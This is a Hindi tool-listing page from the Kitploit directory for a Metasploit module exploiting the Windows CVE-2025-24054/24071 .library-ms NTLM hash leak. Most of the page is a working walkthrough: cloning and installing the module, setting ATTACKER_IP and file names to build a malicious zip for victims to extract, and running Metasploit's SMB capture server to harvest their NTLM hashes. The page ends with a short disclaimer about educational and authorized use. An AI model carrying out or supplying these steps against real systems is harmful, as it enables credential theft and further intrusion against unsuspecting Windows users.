Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24054-24071---Metasploit-Module — मेटास्प्लॉइट मॉड्यूल जो CVE-2025-24054 (पूर्व 24071) का शोषण करता है। विंडोज लाइब्रेरी-आधारित आक्रमण वेक्टरों के लिए मेटास्प्लॉइट में एकीकृत NTLM लीक एक्सप्लॉइट। | Kitploit
उपकरण/GitHubGitHub/securitylayer404/cve-2025-24054-24071---metasploit-module
शोषण फ्रेमवर्कपेलोड जनरेशनशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubsecuritylayer404/cve-2025-24054-24071---metasploit-module

CVE-2025-24054-24071---Metasploit-Module

मेटास्प्लॉइट मॉड्यूल जो CVE-2025-24054 (पूर्व 24071) का शोषण करता है। विंडोज लाइब्रेरी-आधारित आक्रमण वेक्टरों के लिए मेटास्प्लॉइट में एकीकृत NTLM लीक एक्सप्लॉइट।

रिपॉजिटरी देखें
15 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24054/24071 - मेटास्प्लॉइट मॉड्यूल

अवलोकन

यह भेद्यता .zip फ़ाइल को निकालने की प्रक्रिया के दौरान होती है। विशेष रूप से तैयार की गई .library-ms फ़ाइल के साथ इंटरैक्ट करने पर, विंडोज एक्सप्लोरर आंतरिक XML स्कीमा को संसाधित करता है और स्वचालित रूप से हमलावर द्वारा नियंत्रित एक दूरस्थ पथ पर SMB प्रमाणीकरण अनुरोध शुरू करता है।

यह व्यवहार उपयोगकर्ता के NTLM हैश के बहिर्गमन की अनुमति देता है, जिसमें फ़ाइल को अनज़िप करने के अलावा किसी अतिरिक्त इंटरैक्शन की आवश्यकता नहीं होती है। एक प्रूफ ऑफ कॉन्सेप्ट देखने के लिए मैं निम्नलिखित लिंक पर जाने की सलाह देता हूं: Fluffy - HTB.

⚠️ महत्वपूर्ण नोट:

हालांकि मूल रूप से इस भेद्यता को CVE-2025-24071 के रूप में प्रसारित किया गया था, वर्तमान में इसे आधिकारिक रूप से CVE-2025-24054 के रूप में ट्रैक किया जाता है।

📌 स्थापना

रिपॉजिटरी क्लोन करें:

root@kitploit:~
❯ git clone https://github.com/SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module.git
❯ cd CVE-2025-24071

मॉड्यूल को Metasploit निर्देशिका में कॉपी करें:

root@kitploit:~
❯ cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/

यदि निर्देशिका मौजूद नहीं है, तो इसे इस प्रकार बनाएं:

root@kitploit:~
❯ mkdir -p ~/.msf4/modules/auxiliary/server/

फिर मॉड्यूल को फिर से कॉपी करें।

📌 उपयोग

Metasploit प्रारंभ करें और मॉड्यूल लोड करें:

root@kitploit:~
❯ msfconsole -q
❯ use auxiliary/server/ntlm_hash_leak

यदि मॉड्यूल सही ढंग से लोड होता है तो आप इसे कॉन्फ़िगर करने के लिए विकल्प देख सकते हैं:

root@kitploit:~
❯ show options

Module options (auxiliary/server/ntlm_hash_leak):

   Name          Current Setting       Required  Description

   ----          ---------------       --------  -----------

   ATTACKER_IP                         yes       IP del atacante (donde corre Responder/Impacket)

   FILENAME      exploit.zip           yes       El nombre del archivo ZIP

   LIBRARY_NAME  documents.library-ms  yes       Nombre del archivo .library-ms

   SHARE_NAME    recurso               yes       Nombre del recurso compartido ficticio

मॉड्यूल कॉन्फ़िगर करें और चलाएं:

root@kitploit:~
❯ set ATTACKER_IP 0.0.0.0  # Reemplaza con tu IP atacante

❯ set FILENAME exploit.zip  # Nombre del payload que subiras al SMB (equipo objetivo)

❯ set LIBRARY_NAME malicious.library-ms  # Nombre de .library-ms file

❯ set SHARE_NAME it_shared  # Nombre del recurso SMB

❯ run

आउटपुट: मॉड्यूल एक .zip फ़ाइल उत्पन्न करता है जिसे बाद में पीड़ित द्वारा निष्पादन के लिए लक्ष्य SMB सर्वर पर अपलोड किया जाना चाहिए।

root@kitploit:~
[+] exploit.zip stored at /home/user/.msf4/local/exploit.zip
[+] Archivo guardado en: /home/user/.msf4/local/exploit.zip
[*] Auxiliary module execution completed

अंत में, NTLM हैश प्राप्त करने के लिए Metasploit के SMB कैप्चर मॉड्यूल का उपयोग करें:

root@kitploit:~
❯ use auxiliary/server/capture/smb
❯ set SRVHOST 0.0.0.0  # Reemplaza con tu IP atacante
❯ run

यदि आपको Metasploit से SMB सर्वर शुरू करने में समस्या होती है:

  • msfconsole को रूट के रूप में चलाएं
  • सुनिश्चित करें कि ntlm_hash_leak.rb फ़ाइल में रूट द्वारा एक्सेस करने के लिए उपयुक्त अनुमतियां हैं।

⚠️ चेतावनी

यह मॉड्यूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए विकसित किया गया था। इस प्रकार के उपकरणों का अनधिकृत उपयोग अवैध हो सकता है।

🕷 लेखक

Security Layer

टूल डाउनलोड करें